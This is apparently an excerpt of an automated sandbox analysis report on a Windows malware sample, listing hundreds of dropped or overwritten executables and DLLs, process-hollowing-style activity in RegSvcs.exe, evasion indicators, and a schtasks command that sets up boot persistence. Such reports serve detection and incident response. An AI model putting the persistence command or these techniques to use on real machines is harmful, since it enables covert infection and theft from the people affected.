Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-string-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\SearchIndexer.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-util-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\nss3.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\vds.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\Locator.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\nssdbm3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\freebl3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\vcruntime140.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\MUH030425.exeFile created: C:\Users\user\AppData\Roaming\wBBaygjR.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\softokn3.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\mozglue.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\Locator.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\AgentService.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\VSSVC.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\wbengine.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\AppVClient.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\FXSSVC.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\vds.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\alg.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\msiexec.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\SensorDataService.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\msdtc.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

              Boot Survival

              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02C4CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02C4CBD0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_00417B1A
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
